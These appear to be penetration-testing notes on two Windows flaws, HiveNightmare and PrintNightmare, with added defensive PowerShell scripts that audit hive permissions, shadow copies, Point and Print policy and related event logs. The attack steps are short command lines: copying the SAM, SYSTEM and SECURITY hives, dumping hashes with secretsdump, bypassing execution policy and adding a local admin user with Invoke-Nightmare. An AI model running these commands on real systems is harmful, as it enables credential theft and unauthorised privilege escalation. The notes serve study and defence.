M4RCG04M
Windows Vulnerabilities



HiveNightmare.exe

This tool can be used to perform the attack, creating copies of the SAM, SYSTEM and SECURITY registry hives:

.\HiveNightmare.exe

These copies can then be transferred back to the attack host, where impacket-secretsdump is used to extract the hashes:

impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local
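As an added defender-side example (not part of the original notes and not code from the HiveNightmare project), the script below audits the two preconditions the tool depends on: BUILTIN\Users holding read access on the live SAM/SYSTEM/SECURITY hives, and Volume Shadow Copies existing from which those hives can be copied. With the -Remediate switch (a name chosen for this example) it applies Microsoft's published workaround: re-enable ACL inheritance on the config directory and delete existing shadow copies. Run it from an elevated PowerShell session.

```powershell
# Added example, not part of the original notes: audit whether a host exposes the
# SAM/SYSTEM/SECURITY hives the way HiveNightmare.exe relies on, and optionally apply
# Microsoft's documented workaround. The -Remediate switch name is this example's own.
[CmdletBinding()]
param(
    [switch]$Remediate
)

$configDir = Join-Path $env:windir 'System32\config'
$hives = 'SAM', 'SYSTEM', 'SECURITY' | ForEach-Object { Join-Path $configDir $_ }

function Test-HiveExposed {
    param([string]$Path)
    # The bug: BUILTIN\Users received Read/Execute on the live hive files, so any
    # local user can read a copy of them. Reading the ACL needs only READ_CONTROL,
    # which works even though the kernel holds the files open exclusively.
    $acl = Get-Acl -Path $Path
    $readable = $acl.Access | Where-Object {
        $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
        $_.AccessControlType -eq 'Allow' -and
        ($_.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData)
    }
    return [bool]$readable
}

$exposed = @()
foreach ($hive in $hives) {
    if (Test-HiveExposed -Path $hive) {
        Write-Warning "$hive is readable by BUILTIN\Users"
        $exposed += $hive
    } else {
        Write-Host "$hive ACL is restricted"
    }
}

# The live hives cannot be opened for reading while Windows runs; the tool reads them
# out of Volume Shadow Copies, so an exposed ACL only matters if shadow copies exist
# (or the attacker can trigger creation of one, e.g. via an update or restore point).
$shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)
Write-Host ("{0} shadow copies present" -f $shadows.Count)

if ($exposed.Count -gt 0 -and $shadows.Count -gt 0) {
    Write-Warning 'Host is exploitable: exposed hive ACL plus existing shadow copies'
}

if ($Remediate -and $exposed.Count -gt 0) {
    # Microsoft workaround: restore inheritance on everything under System32\config,
    # then remove shadow copies that still contain the hive files with the old ACL.
    & icacls "$configDir\*.*" /inheritance:e
    & vssadmin delete shadows /for=$env:SystemDrive /quiet
}
```

Deleting shadow copies also removes restore points, so on a system where that matters, fix the ACL first and schedule the shadow-copy cleanup separately.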

PrintNightmare

Checking for Spooler Service

We can quickly check if the Spooler service is running with the following command. If it is not running, we will receive a "path does not exist" error.

ls \\localhost\pipe\spoolss

Adding Local Admin with PrintNightmare PowerShell PoC

First start by bypassing the execution policy on the target host:

Set-ExecutionPolicy Bypass -Scope Process

Now we can import the PowerShell script and use it to add a new local admin user.

https://github.com/calebstewart/CVE-2021-1675

Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
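As an added defender-side example (not part of the original notes and not code from the CVE-2021-1675 PoC repository), the function below audits a host for the PrintNightmare preconditions the notes above check by hand (Spooler running, spoolss pipe exposed), the Point and Print policy values Microsoft published as the hardening for it, and the Security events a PoC like Invoke-Nightmare leaves behind when it creates a local user and adds it to Administrators. The registry value names are the real policy values; the 24-hour event window and the function name are this example's own choices. Run it from an elevated PowerShell session.

```powershell
# Added example, not part of the original notes: audit PrintNightmare exposure and
# look for the artefacts the "add a local admin" PoC produces. The function name and
# the 24-hour look-back window are this example's own choices.
function Get-PrintNightmareExposure {
    [CmdletBinding()]
    param([int]$LookbackHours = 24)

    $findings = @()

    # 1. Is the Spooler service running? Disabling it removes the attack surface
    #    entirely on hosts that do not need to print.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($spooler -and $spooler.Status -eq 'Running') {
        $findings += "Spooler service is running (StartType: $($spooler.StartType))"
    }

    # 2. Is the spoolss named pipe exposed? Enumerating \\.\pipe\ is the same check
    #    as the notes' ls \\localhost\pipe\spoolss, without relying on an error message.
    $pipes = [System.IO.Directory]::GetFiles('\\.\pipe\')
    if ($pipes | Where-Object { $_ -like '*\spoolss' }) {
        $findings += 'spoolss named pipe is exposed'
    }

    # 3. Point and Print policy. RestrictDriverInstallationToAdministrators=1 stops
    #    non-admins from installing printer drivers; the two prompt-suppression values
    #    weaken the warnings and should be 0 or absent.
    $ppKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $pp = Get-ItemProperty -Path $ppKey -ErrorAction SilentlyContinue
    if (-not $pp -or $pp.RestrictDriverInstallationToAdministrators -ne 1) {
        $findings += 'RestrictDriverInstallationToAdministrators is not 1: non-admins may install drivers'
    }
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        if ($pp -and $pp.$name -ne $null -and $pp.$name -ne 0) {
            $findings += "$name is $($pp.$name): install warnings/elevation are suppressed"
        }
    }

    # 4. Artefacts of the PoC: a new local user (4720) and a member added to a local
    #    security group such as Administrators (4732).
    $since = (Get-Date).AddHours(-$LookbackHours)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } `
                           -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $firstLine = ($e.Message -split "`n")[0].Trim()
        $findings += "Security event $($e.Id) at $($e.TimeCreated): $firstLine"
    }

    # 5. Driver installs are logged in the PrintService Operational log (ID 316), but
    #    that log is disabled by default, so report whether it is even collecting.
    $printLog = Get-WinEvent -ListLog 'Microsoft-Windows-PrintService/Operational' -ErrorAction SilentlyContinue
    if ($printLog -and -not $printLog.IsEnabled) {
        $findings += 'PrintService/Operational log is disabled: driver installs (ID 316) are not being recorded'
    } elseif ($printLog) {
        $drivers = Get-WinEvent -FilterHashtable @{ LogName = $printLog.LogName; Id = 316; StartTime = $since } `
                                -ErrorAction SilentlyContinue
        foreach ($d in $drivers) {
            $findings += "Printer driver added/updated at $($d.TimeCreated): $(($d.Message -split "`n")[0].Trim())"
        }
    }

    return $findings
}

# Usage: print one line per finding; an empty result means nothing was flagged.
Get-PrintNightmareExposure | ForEach-Object { Write-Warning $_ }
```

The service and pipe checks say whether the host is reachable by the technique at all; the policy checks say whether a low-privileged user could get a driver installed; the event checks are what to search for after the fact, since the PoC's new account shows up as a 4720 followed by a 4732 into Administrators within seconds.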